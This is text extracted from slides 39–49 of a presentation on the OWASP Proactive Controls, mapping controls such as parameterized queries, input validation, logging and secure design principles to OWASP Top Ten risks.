  • 39. 39 Proactive Control Risk(s) prevented C1: Parameterize Queries Leverage to Data Access Layer how parameters are interpreted before executing SQL. • A1 Injection • A10 Unvalidated redirects and forwards C2: Encode Data Encode data before use in a parser ( JS, CSS , XML ) • A1 Injection • A3 XSS C3: Validate all inputs • A1 Injection • A3 XSS • A10 Unvalidated redirects and forwards C4: Implement Appropriate Access Controls • A4 Insecure Direct Object References • A7 Missing Function Level Access Control C5: Establish Identity and Authentication Controls Password storage / Multi-factor authentication / Forgot password design • A2 Broken Authentication and Session Management C6: Data Protection and privacy Data encryption at rest / in transit • A6 Sensitive Data Exposure OWASP Top Ten Mapping
  • 40. C7. Logging, Error Handling and Intrusion Detection 40
  • 41. 41 Proactive Control Risk(s) prevented C7: Implement Logging, Error Handling and Intrusion Detection A1-Injection A2-Broken Authentication and Session Management A3 XSS A4-Insecure Direct Object References A5-Security Misconfiguration A6-Sensitive Data Exposure A7-Missing Function Level Access Control A8-Cross-Site Request Forgery (CSRF) A9-Using Components with Known Vulnerabilities A10-Unvalidated Redirects and Forwards
  • 42. C8. Leverage Security Features of Frameworks and Security Libraries 42
  • 43. 43 Proactive Control Risk(s) prevented C8: Leverage Security Features of Frameworks and Security Libraries For example: • Choose a good database ORM • Choose a framework with already build- in good access control • Choose a framework that already has integrated CSRF A1-Injection A2-Broken Authentication and Session Management A3 XSS A4-Insecure Direct Object References A5-Security Misconfiguration A6-Sensitive Data Exposure A7-Missing Function Level Access Control A8-Cross-Site Request Forgery (CSRF) A9-Using Components with Known Vulnerabilities A10-Unvalidated Redirects and Forwards
  • 45. C9: Security Requirements Functional requirements > visible to QA and testable > E.q: forgot password workflow, re-authentication during change password Non-Functionals requirements : > invisible to QA, not easily testable > E.q: query parametrization, password storage crypto 45
  • 46. 46 Proactive Control Risk(s) prevented C9: Security Requirements Example of security requirements: • Integrity requirements • Availability requirements • Authentication & authorization requirements • Confidentiality requirements • Auditing and logging requirements • Session management requirements • Errors and exception management requirements • Configuration parameters requirements • Archiving requirements • Legal and Compliance Constraints A1-Injection A2-Broken Authentication and Session Management A3 XSS A4-Insecure Direct Object References A5-Security Misconfiguration A6-Sensitive Data Exposure A7-Missing Function Level Access Control A8-Cross-Site Request Forgery (CSRF) A9-Using Components with Known Vulnerabilities A10-Unvalidated Redirects and Forwards
  • 47. C10. Security Architecture and Design 47
  • 48. C10: Security Architecture and Design Principles Secure design principles: • Least Privilege = minimum access level for minimum amount of time • Separation of duties • Defence of depth. E.q.: • input validation + parameterize queries • input validation + output encoding • Fail secure. E.q.: • user access denied after maximum number of failed logins reached • errors and exception handling; store error details in database, give user only the reference ID • Complete mediation. E.q.: • centralise access control checks • centralise input validation 48
  • 49. 49 Proactive Control Risk(s) prevented C10: Security Architecture and Design Secure design principles: • Least Privilege • Separation of duties • Defence of depth • Fail secure • Complete mediation • Open design A1-Injection A2-Broken Authentication and Session Management A3 XSS A4-Insecure Direct Object References A5-Security Misconfiguration A6-Sensitive Data Exposure A7-Missing Function Level Access Control A8-Cross-Site Request Forgery (CSRF) A9-Using Components with Known Vulnerabilities A10-Unvalidated Redirects and Forwards